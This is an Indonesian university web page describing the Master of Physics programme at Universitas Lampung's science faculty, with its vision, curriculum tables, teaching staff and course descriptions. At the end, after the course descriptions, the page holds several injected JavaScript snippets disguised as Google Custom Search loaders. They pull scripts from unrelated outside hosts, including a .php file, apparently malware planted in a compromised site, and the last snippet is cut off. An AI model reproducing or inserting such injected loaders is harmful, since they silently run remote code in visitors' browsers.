MAGISTER FISIKA

MAGISTER FISIKA
PENDAHULUAN
Penyelenggaraan otonomi daerah menekankan pada prinsip-prinsip demokrasi, peran serta masyarakat, pemerataan dan keadilan, serta memperhatikan potensi dan keanekaragaman wilayah. Prinsip-prinsip ini mencerminkan bahwa peningkatan sumberdaya manusia di daerah ini kalau bisa akan dipenuhi sendiri sepanjang masih bisa dan memang memadai dan berkualitas. Kewajiban dan tanggung jawab pemerintah daerah tersebut akan bersinggungan dengan pihak-pihak terkait seperti guru-guru, dosen, dan sebagainya.
Dalam menggali potensi daerah, pada era otonomi daerah kegiatan ini merupakan tanggung jawab masyarakat setempat, maka rangkaian kegiatan tersebut akan semakin banyak dilakukan, sehingga diperlukan sumberdaya manusia (SDM) yang professional untuk mendukungnya. Sedangkan pemerintah daerah, pemerintah kota, dan para pihak terkait mempunyai kendala kekurangan SDM yang berkualitas. Di sisi lain, kemampuan pemerintah  untuk mengangkat pegawai baru sesuai dengan kebutuhan sangat terbatas.
Pada saat ini dalam mendukung kualitas SDM yang berkualitas khususnya dalam dunia pendidikan, guru-guru pada tingkat sekolah lanjutan pertama, sekolah lanjutan atas maupun sekolah-sekolah kejuruan, perlu dilakukan peningkatkan pendidikan ke jenjang yang lebih tinggi. Selain itu dalam mengantisipasi keinginan tamatan S1 Ilmu Fisika FMIPA Unila untuk melanjut ke jenjang S2 juga menjadi pertimbangan. Dalam rangka meningkatkan kualitas SDM menjadi professional, maka program Pascasarjana Universitas Lampung menyelenggarakan program pendidikan lanjutan Pascasarjana (S2) Program Studi Fisika pada Fakultas Matematika dan Ilmu Pengetahuan Alam.
          �� Berdasarkan hal-hal riel inilah yang mendasari FMIPA Unila mendirikan Program Magister Ilmu Fisika. Sejak Juni 2014, Magister Fisika FMIPA Unila resmi diberi mandat oleh DIKTI untuk beroperasi sesuai dengan izin Kemendikbud No. 441/E.E2/DT/2014 tertanggal 19 Mei 2014.
VISI, MISI, DAN TUJUAN
Visi
Program studi pascasarjana (S2) Ilmu Fisika yang dikenal baik secara internasional dan unggul secara nasional dalam kegiatan pendidikan, penelitian, dan pengabdian kepada masyarakat, serta menghasilkan lulusan yang kompeten dalam bidangnya, literate dalam teknologi informasi, berjiwa wirausaha, dan mampu bersaing di tingkat nasional dan internasional.
Misi

Menumbuhkembangkan wahana keilmuan fisika dalam segala aspek sehingga bermanfaat bagi semua orang.
Menumbuhkembangkan pemahaman fisika sehingga dikenal baik dalam masyarakat.
Mengupayakan agar Ilmu Fisika dikenal dan dihargai oleh seluruh lapisan masyarakat melalui rangkaian kegiatan pemanfaatan Fisika untuk menunjang kesejahteraan dan kenyamanan masyarakat dalam aspek material maupun spiritual.

Tujuan
Program S2  Ilmu Fisika memiliki tujuan khusus sesuai dengan Rencana Strategis (RENSTRA) Pengembangan FMIPA Unila, yaitu untuk memenuhi kebutuhan negara akan tenaga profesional di bidang pendidikan tinggi, penelitian dan pengembangan iptek dan industri dengan mengupayakan lulusan S2 Fisika yang memiliki tingkat kompetensi sebagai berikut:

Menguasai dengan lebih mantap kemampuan-kemampuan dasar yang relevan dengan bidang yang ditekuninya dalam taraf magister.
Mengikuti perkembangan, meningkatkan dan mengembangkan materi serta ketrampilan keilmuan maupun penelitian dalam bidang Fsika baik secara mandiri maupun secara berkelompok.
Menguasai materi-materi kunci dalam bidang Fisika agar dapat mengajar dengan baik di Program Sarjana (S1), bekerja mandiri di penelitian, pengembangan iptek dan industri, terutama untuk mengikuti studi lanjut pada Program Doktor (S3).
Dapat berkomunikasi ilmiah secara lisan dan tulisan.

SISTEM PENDIDIKAN DAN BEBAN STUDI
Pendidikan diselenggarakan dengan sistem kredit semester (SKS). Program magister ini dirancang untuk 4 semester, dan dapat diselesaikan dengan masa tempuh paling cepat 3 semester dan paling lambat 8 semester, dengan beban perkuliahan satuan kredit semester 32 sks. Dalam beban sks ini akan ditambah para lulusan harus mempublikasikan karya ilmiah dalam jurnal-jurnal yang bereputasi baik nasional maupun internasional.
PROFIL LULUSAN
Lulusan Program Magister (S2) secara umum diarahkan pada hasil lulusan yang memiliki ciri-ciri sebagai berikut:

mempunyai kemampuan meningkatkan pelayanan profesi dengan jalan penelitian dan pengembangan,
mempunyai kemampuan berpartisipasi dalam pengembangan bidang ilmunya,
mempunyai kemampuan mengembangkan penampilan profesionalnya dalam spektrum yang lebih luas dengan mengaitkan bidang ilmu atau profesi yang serupa, dan
mempunyai kemampuan merumuskan pendekatan penyelesaian berbagai masalah masyarakat dengan cara penalaran ilmiah.

KURIKULUM
Program Pascasarjana Magister Fisika FMIPA Unila menawarkan 3 bidang konsentrasi keilmuan yaitu, Fisika Material, Fisika Instrumentasi dan Pengajaran Fisika. Sekalipun demikian kompetensi ilmu Fisikanya tetap dipertahankan sehingga kalau suatu ketika kelak mahasiswa ingin melanjutkan pendidikan ke strata yang lebih tinggi, dasar pengetahuan fisikanya sudah memadai.
Tes Matrikulasi
Dalam tes matrikulasi ini akan diujikan fisika matematika, mekanika klasik, listrik magnet, termodinamika, optik dan fisika modern. Tujuannya  untuk melihat kompetensi mahasiswa masuk ke perkuliahan S-2 yang sebenarnya.
Daftar mata kuliah dapat dilihat dalam Tabel 1. Pada tabel ini disajikan pertama mata kuliah wajib baik dari program sendiri maupun dari universitas. Setelah itu disajikan minat Fisika Material  (Tabel 2), Fisika Instrumentasi (Tabel 3) dan Minat Pengajaran Fisika (Tabel 4).
Tabel 1.  Kurikulum Program Studi Fisika

No

Kode Mata Kuliah
Nama Mata Kuliah

Jumlah SKS

Keterangan

1

UNI812101
Filsafat Ilmu

2

Wajib Universitas

2

UNI812102
Metodologi Penelitian

2

Wajib Universitas

3

FIS812101
Fisika Matematik

4

Wajib Program

4

FIS812102
Mekanika Klasik

4

Wajib Program

5

FIS812103
Elektrodinamika

4

Wajib Program

6

FIS812104
Fisika Komputasi

3

Wajib Program

7

FIS812137
Proposal Thesis

5

Wajib Program

8

FIS812138
Penelitian dan Penulisan Thesis

20

Wajib Program

9

FIS812139
Seminar

5

Wajib Program

10

FIS812140
Karya Ilmiah

10

Wajib Program

 ��     ��                         �� Jumlah
     59

Tabel 2. Minat Fisika Material

No

Kode Mata Kuliah
Nama Mata Kuliah

Jumlah SKS

Keterangan

1

FIS812105
Sains dan Teknologi Bahan

3

Pilihan Program

2

FIS812106
Metode Fisika dan Karakterisasi Bahan

2

Pilihan Program

3

FIS812107
Lapisan Tipis

2

Pilihan Program

4

FIS812108
Pemrosesan dan Sintering Keramik

2

Pilihan Program

5

FIS812109
Nanomaterial

2

Pilihan Program

6

FIS812110
Biokeramik

2

Pilihan Program

7

FIS812111
Aplikasi Nuklir Industri

3

Pilihan Program

8

FIS812112
Bahan Magnetik

2

Pilihan Program

9

FIS812113
Bahan Polimer Lanjut

2

Pilihan Program

10

FIS812114
Analisis Data Difraksi

2

Pilihan Program

11

FIS812115
Material Akustik

2

Pilihan Program

12

FIS812116
Korosi Lingkungan

2

Pilihan Program

����  ��      ��                        Jumlah
     26

Tabel 3. Minat Fisika Instrumentasi

No

Kode Mata Kuliah
Nama Mata Kuliah

Jmlah SKS

Keterangan

1

FIS812117
Sensor dan Tranduser

3

Pilihan Program

2

FIS812118
Instrumentasi dan Pengukuran

2

Pilihan Program

3

FIS812119
Pemrosesan Sinyal Digital Lanjut

2

Pilihan Program

4

FIS812120
Instrumentasi Cerdas

2

Pilihan Program

5

FIS812121
Akuisisi Data Fisis Lingkungan

2

Pilihan Program

6

FIS812122
Uji Tak Merusak

2

Pilihan Program

7

FIS812123
Sistem Komunikasi Tanpa Kabel

3

Pilihan Program

8

FIS812124
Sistem Kendali Lanjut

2

Pilihan Program

9

FIS812125
Komputasi Nuklir

2

Pilihan Program

10

FIS812126
Kapita Selekta Instrumentasi

2

Pilihan Program

11

FIS812127
Instrumentasi Nuklir

2

Pilihan Program

12

FIS812128
Arsitektur Sistem Komputer

2

Pilihan Program

                                   Jumlah
��   26

Tabel 4. Minat Pengajaran Fisika

No

Kode Mata Kuliah
Nama Mata Kuliah

Jumlah SKS

Keterangan

1

FIS812129
Sejarah dan Literatur Fisika

3

Pilihan Program

2

FIS812130
Teknologi Informasi dalam Pembelajaran Fisika

4

Pilihan Program

3

FIS812131
Fisika dalam Kehidupan Sehari-hari

2

Pilihan Program

4

FIS812132
Metode dan Teknologi Mengajar

2

Pilihan Program

5

FIS812133
Teknik Pembelajaran Fisika

2

Pilihan Program

6

FIS812134
Fisika Kreatif dan Animasi

3

Pilihan Program

7

FIS812135
Pendalaman Pembelajaran  Fisika

2

Pilihan Program

8

FIS812136
Praktikum Fisika

2

Pilihan Program

                        ��   ������ ��������  �� Jumlah
 ������������   20

Sebagaimana diharapkan pemerintah, tenaga pengajar Program Magister harus mempunyai pendidikan minimal S3. Pada Tabel 5 disajikan daftar staf pengajar tetap Magister Fisika Program Pascasarjana Universitas Lampung.
Tabel 5. Tenaga pengajar Magister Fisika Universitas Lampung

No
Nama Lengkap
Strata, Alumni

Tahun Tamat
Bidang Ilmu

1

Dra. Dwi Asmi, M.Si., Ph.D.
S1 dari Unila, 1985

S2 dari ITB, 1991

S3 dari Curtin, 2001
Fisika Material

2

Prof. Drs. Simon Sembiring, Ph.D.
S1 dari USU, 1987

S3 dari Curtin, 2007
Fisika Material

3

Dr. Yanti Yulianti, S.Si., M.Si.
S1 dari ITB, 1998

S2 dari ITB, 2001

S3 dari ITB, 2010
Fisika Reaktor

4

Bambang Joko Suroto, M.Si., Ph.D.
S1 dari ITB, 2003

S2 dari ITB, 2006

S3 dari Kyushu, 2014
Fisika Nuklir

5

Prof. Dr. Warsito, DEA
S1 dari Unibraw, 1995

S2 dari Caen, 1991

S3 dari Univ. Caen- Prancis, 2003
Fisika Instrumentasi

6

Drs. Posman Manurung, M.Si., Ph.D.
S1 dari USU, 1986

S2 dari ITB, 1991

S3 dari Curtin, 2002
Fisika Material

DESKRIPSI MATA KULIAH
Filsafat Ilmu, UNI812101 (2 sks)
Mata kuliah ini diberikan dengan tujuan memberi bekal ke mahasiswa terutama konsep dasar berfikir ilmiah dan membangkitkan gairah dan semangat mahasiswa agar mampu memperkuat posisi diri mengenai hakekat keilmuan dan hubungannya dengan konsep-konsep dasar sains. Fokus kajian dalam mata kuliah ini antara lain aliran filsafat baik yang klasik maupun modern.  Mengkaji konsep pengetahuan, struktur dan karakteristik ilmu, pengetahuan, logika dan cara berfikir kritis. Mendata masalah dan cara pendekatan untuk menyelesaikan masalah tersebut. Kajian dan penelitian tentang ilmu pengetahuan dan dimensi ontologi, epistemologi dan aksiologi.
Metodologi Penelitian, UNI812102 (2 sks) 
Perkuliahan ini menekankan kepada aspek ketrampilan mahasiswa untuk menyusun proposal penelitian, laporan penelitian, desertasi, dan karya ilmiah dalam bentuk jurnal.  Untuk itu perkuliahan ini mempelajari langkah-langkah metode ilmiah, masalah dan identifikasi perumusan masalah, tehnik penyusunan hipotesis, menyusun rancangan percobaaan, tehnik penulisan desertasi dan karya ilmiah.
Fisika Matematik, FIS812101 (4 sks)
Perkuliahan ini membahas mengenai analisis vektor dan tensor, koordinat lengkung, ruang vektor linier, perkalian skalar dalam Ruang Hilbert.  Kemudian matriks, penyelesaian sistem persmaan linier, masalah nilai eigen dan operator. Persamaan difrensial dan integral dalam fisika. Hal yang juga tidak kalah pentingnya adalah syarat batas, metode penyelesaian standard dan teori fungsi serta penerapannya.
Mekanika Klasik,  FIS812102 (4 sks)
Perkuliahan ini membahas lebih dalam asas-asas dasar Mekanika Newton, Lagrange dan Hamilton. Sistem dengan kendala, simetri dan hukum-hukum kekekalan. Sistem dua benda, gerak Kepler, kinematika dan dinamika benda tegar. Variabel dan trasformasi kanonik, persamaan gerak Poisson, teori Hamilton-Jakobi, dinamika relativistik, ayunan-ayunan kecil dan ragam normalnya.
Elektrodinamika, FIS812103 (4 sks)
Dalam kuliah ini akan dibahas perumusan relativistik hukum-hukum elektrodinamika, masalah statik tentang multipol listrik dan magnet. Elektrodinamika dalam media kontinu dan masalah perbatasannya. Dalam masalah dinamis akan membahas potensial Lienard-Wiechert, hamburan elektromagnetik, masalah syarat batas medan dinamik dan radiasi multipol.
Fisika Komputasi, FIS812104 (3 sks)
Pengertian dasar Fisika Komputasi, penyajian beda hingga dari operator difrensial dan integral. Penyelesaian persamaan tak linier, masalah syarat awal, masalah syarat batas. Penerapan berbagai metode untuk berbagai kasus fisika. Dalam parktek akan dikenalkan langkah-langkah pemograman dan penyelesaian berbagai kasus fisika.
Sains dan Teknologi Bahan, FIS812105 (3 sks)
Kuliah ini membahas tentang pengantar sains dan teknologi material, struktur dan ikatan atom, struktur dan geometri kristal, kepadatan, ketidakmurnian kristalin, dan difusi zat padat, sifat-sifat listrik material, sifat-sifat mekanik logam, material polimer, diagram fasa, teknologi paduan, material keramik dan magnetik, korosi, material komposit, sifat-sifat optik dan superkonduktor material.
Metode Fisika dan Karakterisasi Bahan, FIS812106 (2 sks)
Kuliah ini membahas tentang metode Fisika dalam menganalisis mikrostruktur material, interaksi radiasi dengan material, sistem vakum, difraksi, sumber-sumber foto/elektomagnetik, sumber-sumber elektron, dan sumber-sumber atom dan ion.
Lapisan Tipis, FIS812107 (2 sks)
Kajian dalam mata kuliah Lapisan Tipis meliputi metode preparasi bahan lapisan tipis, dengan metode kimia/elektrokimia, metode penguapan, metode pengendapan (chemical bath deposition) dan sputtering. Mempelajari metode pengukuran ketebalan lapisan tipis dan mekanismenya yakni metode kesetimbangan, elektrik dan optik, struktur kristal lapisan tipis, komposisi dan material substrak. Selanjutnya karakterisasi, karakteristik dan aplikasi lapisan tipis meliputi XRD, SEM, XRD, magnetik, elektrik, mekanik, adhesi, dan optik, kapasitor, induktor dan IC.
Pemrosesan dan Sintering Keramik, FIS812108 (2 sks)
Kuliah ini membahas tentang tinjauan pemrosesan keramik, sintesis bubuk, karakterisasi bubuk, pemrosesan koloid, pemrosesan sol-gel, konsolidasi bubuk dan pembentukan keramik, dasar-dasar sintering keramik, teori sintering zat padat dan viskos, pertumbuhan butiran dan kontrol mikrostruktur, liquid phase sintering, masalah-masalah sintering.
Nanomaterial, FIS812109 (2 sks)
Kuliah ini membahas tentang apa itu nanomaterial, pengaruh ukuran pada sifat material, sintesis nanostruktur material, karakterisasi nanostruktur matrial, kuantum dot, kawat nano, karbon nanotube, dan material nanokomposit.
Biokeramik, FIS812110 (2 sks)
Kuliah ini membahas tentang dasar-dasar biokeramik: Struktur dan sifat mekanik tulang, proses fabrikasi biokeramik, mikrostruktur biokeramik dan analisisnya, sifat mekanik biokeramik, desain keramik untuk pergantian persendian, respon seluler pada bioaktif keramik, evaluasi invitro bioaktifitas tulang, osteokonduksi dan osteoinduksi dan evaluasinya, Tipe biokeramik: alumina dan zirconia biokeramik, bioaktif glas, bioaktif glas-keramik, hidroksiapatit, trikalsium posfat/hidroksiaptit bipasik keramik, Si-substitusi hidroksiapatit, dental keramik dan aplokasi biokeramik.
Aplikasi Nuklir Industri, FIS812111 (2 sks)
Mata kuliah ini membahas aplikasi nuklir secara umum di bidang produksi energi, aplikasi di industri dan kesehatan. Aplikasi nuklir dibidang energi mencakup reaktor nuklir fisi dan fusi serta penjelasan mengenai bateri nuklir dan klasifikasinya. Aplikasi nuklir dalam industri perminyakan dan gas juga akan dibahas. Aplikasi nuklir untuk bidang kesehatan: produksi radiosisotop untuk penggunaan pengobatan misalnya dan terapi radiasi pada kasus penyakit tertentu.
Bahan Magnetik, FIS812112 (2 sks)
Mata kuliah bahan magnetik mengkaji teori dasar sifat magnetisme, paramagnetisme, anisotropi magnet kristalin. Mempelajari sifat fisika material magnetik meliputi gejala kemagnetan zat padat, (domain, magnetisasi, piezolektrisitas, ferroelektrisitas histerisis, efek magnetoelastik dan efek magnetoresistif
Bahan Polimer Lanjut, FIS812113 (2 sks)
Pada matakuliah bahan polimer lanjut mempelajari sifat termal dan listrik, sifat mekanik dan sintesis polimer secara kondensasi dan adisi, serta pengujian polimer. Mempelajari prinsip dasar termodidamika,  keseimbangan dan kinetika polimerisasi. Selanjutnya mempelajari metode fisik dan kimia karakterisasi polimer meliputi FTIR, DTA/DSC dan XRD.
Analisis Data Difraksi, FIS812114 (2 sks)
Kajian dalam mata kuliah Analisis Data Difraksi menyangkut teori dasar mengenai sinar-X, mesin penghasil difraksi, jenis-jenis difraksi dan teknik koleksi data. Selanjutnya hasil difraksi berupa difraktogram dapat dianalisis secara kuantitatif (metode analisis search match dengan pangkalan data) dan secara kualitatif (metode penghalusan dalam hal ini metode Rietveld). Karena begitu rumitnya perhitungan dalam analisis ini maka perlu diselesaikan dengan bantuan software. Begitu banyak di pasaran software untuk analisis data difraksi. Dari begitu banyak pilihan akan dipilih yang free namun bermutu, yaitu Rietica.
Material Akustik, FIS812115 (2 sks)
Mata kuliah material akustik mempelajari: Dasar akustik, sifat bunyi, sistem penguat dan isolasi bunyi, bising lingkungan. Mempelajari karakteristik material secara fisis (termal, mekanik, elektrikal bunyi) yang relevan dengan dasar-dasar akustik untuk sebagai peredam maupun penguat suara.
Korosi Lingkungan, FIS812116 (2 sks)
Konsep elektrokimia: dasar dan aplikasinya, definisi korosi, bentuk korosi, konsep elektrikal yang relevan dengan korosi, prediksi kecenderungan korosi secara termodinamika, elektrolit, Kinetika korosi, over-potential (polarisasi), pasivasi, pengukuran kecepatan korosi, aspek metalurgi, bentuk-bentuk korosi, dan pengujian korosi (metode kupon kehilangan berat, elektrokimia). Selanjutnya Teori dasar proteksi katodik, instrument untuk proteksi korosi, proteksi katodik pada lingkungan air laut, tanah, dan struktur dalam beton (semen), klasifikasi material, hubungan material dan lingkungan secara spesifik, untuk pencegahan korosi, sifat ketahanan material baja yang umum dipakai (bajatuang, baja karbon , baja paduan rendah, nikel, aluminium, tembaga, seng, titanium dan paduan-paduannya, ketahanan korosi material bukan logam (rubber, plastic, composite, ceramic).
Sensor dan Tranduser, FIS812117 (3 sks)
Mata kuliah ini akan membahas prinsip dasar konversi besaran fisis ke besaran elektris oleh sensor. Pemahaman sistem konversi ini akan mengantarkan pemahaman mahasiswa akan perbedaan antara sensor dan transduser. Bagian selanjutnya akan mempelajari berbagai jenis sensor yang meliputi karakteristik sensor dan prinsip dasar aplikasi.
Instrumentasi dan Pengukuran, FIS812118 (2 sks)
Prinsip dasar dari suatu instrumen adalah komponen input, proses dan output. Pemahaman akan ketiga komponen tersebut menjadi bahasan awal dalam kuliah ini. Karakteristik berbagai instrumentasi juga akan dibahas. Penguasaan akan karakteristik suatu instrumen akan mengantarkan pada bahasan beriktnya yaitu pengukuran, pada bagian ini akan diawali akan penguasaan sistem kalibrasi, metode pengukuran yang tepat dan diakhiri metode analisis data hasil pengukuran.
Pemrosesan Sinyal Digital Lanjut, FIS812119 (2 sks)
Mata kuliah ini merupakan kelanjutan dari pemrosesan sinyal digital, di mana pada kuliah ini diharapkan mahasiswa telah menguasai tentang sinyal sistem dan komponen dasar dalam sistem sinyal digital serta penguasaan sinyal dalam domain waktu. Pada bahasan sinyal digital lanjut siswa akan diawali pemahaman ulang terkait dengan sinyal dalam domain frekuensi serta pemrograman sinyal digital. Bahasan selanjutnya adalah fast fourier transformation (FFT), desain filter digital dan pemahaman prinsip pengolahan citra serta sistem pemfilteran dalam pengolahan citra digital.
Instrumentasi Cerdas, FIS812120 (2 sks)
Mata kuliah ini akan membahas sistem instrumen yang cerdas dalam makna sistem instrumen yang mampu memproses sistem secara mandiri dari hasil penginderaan yang dilakukan serta pengalaman yang dimiliki. Sehingga instrumen akan mampu mengolah data-data yang diterimanya kemudian diberikan aksi/respon yang optimal sesuai dengan pengalaman atau yang telah diajarkan pada sistem. Untuk itu dalam mata kuliah ini akan mempelajari sistem jaringan syaraf tiruan, dan sistem logika samar (fuzzy logic systems).
Akuisisi Data Fisis Lingkungan, FIS812121 (2 sks)
Mata kuliah ini akan memperkenalkan besaran fisis apa saja yang mempengaruhi keadaan lingkungan, misalnya temperatur, polusi udara, bising, medan magnet, getaran. Prinsip-prinsip tersebut akan dikaji ulang, sekaligus akan disajikan sistem akuisisi datanya, mulai dari karakteristik alat dan akuisisi data, serta analisis data hasil pengukuran.
Uji Tak Merusak, FIS812122 (2 sks)
Mata kuliah ini merupakan kelanjutan dari sensor dan transduser, namun secara khusus akan mempelajari prinsip-prinsip dasar uji tak merusak. Prinsip-prinsip uji tak merusak berbasis optik, magnetik, thermal serta ultra sonik akan dibahas dengan lebih detail. Pemanfaatan dengan prinsip analog dan digital akan menjadi kajian selanjutnya dan diakhir dengan uji kasus sistem uji tak merusak di sekitar kita.
Sistem Komunikasi Tanpa Kabel, FIS812123 (3 sks)
Perkembangan sistem tranasmisi data untuk keperluan komunikasi berkembang pesat seiring dengan tuntutan zaman. Mata kuliah ini juga merupakan kelanjutan dari mata kuliah sistem transmisi data dan secara khusus akan membahas pemanfaatan gelombang EM dalam bidang komunikasi. Sistem hardware dari komponen komunikasi tanpa kabel serta pemanfaatan gelombang EM dalam hal ini sistem optik akan menjadi kajian utama dari mata kuliah ini.
Sistem Kendali Lanjut, FIS812124 (2 sks)
Mata kuliah Sistem kendali lanjut juga merupakan bahasan lanjutan dari mata kuliah sistem kendali otomatis. Dalam mata kuliah ini akan mengulas pemahaman fungsi alih tiap komponen sistem pengendalian, serta fungsi alih dari suatu sistem secara integral. Mata kuliah ini juga akan mengkaji studi kasus di industri terkait dengan sistem pengendalian serta membahas fungsi alihnya.
Komputasi Nuklir, FIS812125 (2 sks)
Kuliah ini memfokuskan masalah metode komputasi untuk menyelesaikan persamaan difusi neutron, persamaan kinetika titik, persamaan burn-up, thermal hidrolik, umpan balik reaktifitas dan solusi perhitungan dengan metode Monte Carlo.
Kapita Selekta Instrumentasi, FIS812126 (2 sks)
Mata kuliah ini akan membahas suatu topik khusus terkait dengan sistem instrumentasi di industri. Mengkaji secara individu dari sistem instrumen tersebut maupun secara integral dari instrumen tersebut. Mahasiswa nantinya diharapkan mampu memahami karakteristik secara individu instrumen tersebut serta secara integral.
Instrumentasi Medis, FIS812127 (2 sks)
Mata kuliah ini akan diawali pemahaman prinsip-prinsip fisika di bidang medis. Selanjutnya akan mempelajari prinsip kerja instrumentasi kardiovaskular: ECG (Electro Cardio Graph), Defribillator,dan Pacemaker. Peralatan selanjunya adalah foto sinar-X medis, ultrasonografi, Electrosurgical units dan Laser surgery. Memahami prinsip kerja instrumentasi biomedis: EEG (Electroenchelopa graph), EMG (Electromyograph), CT-Scan dan magnetic resonance imaging (MRI).
Arsitektur Sistem Komputer, FIS812128 (2 sks)
Mata kuliah ini akan membahas komputer secara hardware dan software pendukungnya untuk fungsi akuisisi data dan sistem pengendali. Bahasan terkait dengan port-port eksternal komputer menjadi kajian utama karena sebagai jembatan komunikasi dengan hardware eksternal.
Sejarah dan Literatur Fisika, FIS812129 (3 sks)
Mata kuliah ini membahas sejarah Fisika dari yang tadinya dianggap gaib saat permulaan hingga teori kuantum yang diaut sekarang. Dalam sejarah ini peranan Timur Tengah, Junani, India dan Cina akan dibahas. Literatur mencakup pengetahuan Fisika Klasik, Fisika Modern hingga ke Fisika kuantum elektrodinamika.
Teknologi Informasi dalam Pembelajaran Fisika, FIS812130 (4 sks)
Bagaimanapun pada era informasi ini telah memicu para pengajar untuk meningkatkan ilmu pengetahuannya terlebih dalam perkembangan Fisika. Disebutkan bahwa semua guru sekarang wajib mempunyai blog tersendiri agar dapat memanfaatkan alat bantuan berupa semua media yang dapat meningkatkan pengajaran di kelas. Dalam kuliah ini akan dibahas peranan teknologi informasi dalam membantu pembelajarn Fisika sehingga apa yang dianggap orang selama ini bahwa Ilmu Fisika itu sulit menjadi lebih mudah dimengerti.
Fisika dalam Kehidupan Sehari-hari, FIS812131 (2 sks)
Fisika adalah ilmu yang mempelajari alam dan sekitarnya. Bagaimana proses gerak akan dibahas dikaitkan dengan kehidupan sehari-hari. Banyak kejadian dalam kehidupan sehari-hari yang dapat diterangkan dengan ilmu Fisika. Penghantaran panas, penghantaran arus, sistem kerja mesin Carnot sampai teknologi komunikasi. Perkembangan teknologi elektronika juga akan dibahas dalam kuliah ini.
Metode dan Teknologi Mengajar, FIS812132 (2 sks)
Metode dan Teknologi Mengajar adalah dua hal yang perlu difahami para guru agar mereka mampu mentransfer ilmunya ke siswa. Sering kita selalu mempertahankan metode yang menurut kita sudah baik akan tetapi hasilnya tidak memuaskan. Masih banyak guru sekarang enggan memanfaatkan semua media yang ada dengan alasan repot. Memanfaatkan keunggulan komputer, menggunakan bahan ajar mandiri, memanfaatkan kurikulum dan e-learning.
Teknik Pembelajaran Fisika, FIS812133 (2 sks)
 Memanfaatkan jadwal pembelajaran, kurikulum, dan hasil kemajuan belajar dan berkaitan dengan administrasi pendidikan dapat setiap saat dilihat dikomputer. Pemanfaatan e-learning tidak dapat lepas dari internet, pada zaman dahulu pembelajaran masih didominasi oleh peran guru (the era of teacher), kemudian bergeser menjadi guru dan buku (the era teacher and book) dan saat ini telah mengalami pergeseran peran guru, buku dan teknologi (the era of teacher, book and technology). Menyediakan material pembelajaran seperti buku, computer, multimedia, studio, dan lain-lain yang memadai.

Fisika Kreatif dan Animasi, FIS812134 (3 sks)
Banyak problem dalam Fisika dapat diselesaikan dengan metode-metode tertentu. Kreatifitas mencari solusi itu dapat diselesaikan dengan teknik animasi. Perkuliahan mencakup pendekatan dengan menggunakan pemograman komputer. Animasi gerak, animasi penyelesaian soal seperti kejadian reaksi inti dalam reaktor nuklir.
Pendalaman Pembelajaran Fisika, FIS812135 (2 sks)
Dalam mata kuliah ini akan didalami materi Fisika yang diajarkan di Sekolah Menengah yang ditinjau dari sudut pandang yang lebih tinggi. Pendalaman teori relativitas, mekanika, fluida, termodinamika dan kalor, gelombang dan optik, fisika modern hingga pendahuluan fisika inti. Porsi yang lebih banyak dibahas dalam kuliah ini utamanya adalah mekanika.
Praktikum Fisika, FIS812136 (2 sks)
Tidak dapat disangkal bahwa salah satu kesulitan dalam memahami Fisika adalah karena minimnya fasilitas penunjang berupa laboratorium. Membangun laboratorium Fisika secara lengkap juga membutuhkan biaya besar. Dalam kuliah Praktikum Fisika ini di samping memanfaatkan fasilitas yang ada, para guru juga dirangsang supaya dapat mengembangkan laboratorium Fisika di sekolahnya masing-masing dengan memanfaatkan peralatan yang dapat dibeli di lokal market.
Proposal Thesis, FIS812137 (5 sks)
Kegiatan penelitian mandiri dimulai dari pembuatan usul penelitian, seminar proposal, seminar hasil sampai dengan penulisan tesis. Hasil penelitian harus diseminarkan dan dipertanggungjawabkan dalam ujian akhir. Diharapkan keluaran tesis dapat mengasilkan jurnal bereputasi baik nasional maupun internasional.
Penelitian dan Penulisan Thesis, FIS812138 (20 sks)
Penelitian mencakup pelaksanaan di lapangan apa yang telah ditulis dalam proposal tesis. Karena Fisika lebih cenderung pada penelitian laboratorium maka penelitian harus mengikuti asas penelitian laboratorium seperti tempat dan waktu pelaksanaan, alat-alat yang dipakai dan bahan yang digunakan. Setelah mendapat hasil dari serangkaian penelitian, mahasiswa diharapkan dapat menulis tesis sesuai dengan pedoman penulisan tesis. Hal yang paling penting dalam penulisan adalah bagaimana merangkai kata pendahuluan sehingga pembaca tertarik dengan tesis itu. Selanjutnya menuliskan teori-teori pendukung. Hal yang paling penting adalah bagaimana melakukan analisis yang tajam sehingga pembahasan sesuai dengan kaidah ilmiah.
Seminar, FIS812139 (5 sks)
Dalam seminar ini mahasiswa diharapkan mempersiapkan diri menghadapi seminar hasil penelitiannya baik tingkat di Universitas Lampung sendiri maupun tingkat nasional dan syukur bisa ke tingkat internasional. Mahasiswa diminta menyiapkan bahan seminar dalam bentuk power point yang mudah, ringkas tapi jelas. Baik itu dari segi font, warna background dan warna font itu sendiri. Jangan sampai warna huruf tertutupi warna latar belakang sehingga tidak dapat dibaca oleh pendengar.
Karya Ilmiah, FIS812140 (10 sks)
Ini adalah kemampuan mahasiswa menulis hasil penelitian dalam jurnal nasional terakreditasi dan pengakuan yang bertaraf internasional. Selama ini hasil keluaran tesis cenderung hanya menjadi tambahan koleksi perpustakaan sendiri sehingga orang di luar sana tidak pernah tahu apa yang telah kita lakukan. Mulai sekarang seberapa rendahpun hasil karia ilmiah kita, ada baiknya disebarkan ke seluruh dunia. Dan itulah filosofi ilmu pengetahuan itu sendiri. Menulis karya ilmiah bukan untuk tujuan kesombongan akan tetapi membagi apa yang telah kita peroleh ke semua orang. Kalau jurnal tingkat nasional tentu cakupan penyebaran sangat terbatas, akan tetapi bila jurnal internasional berarti cakupannya seluruh umat manusia yang ada di jagat kita ini. Dan itu luar biasa.

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://theboatersnetwork.com/js/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
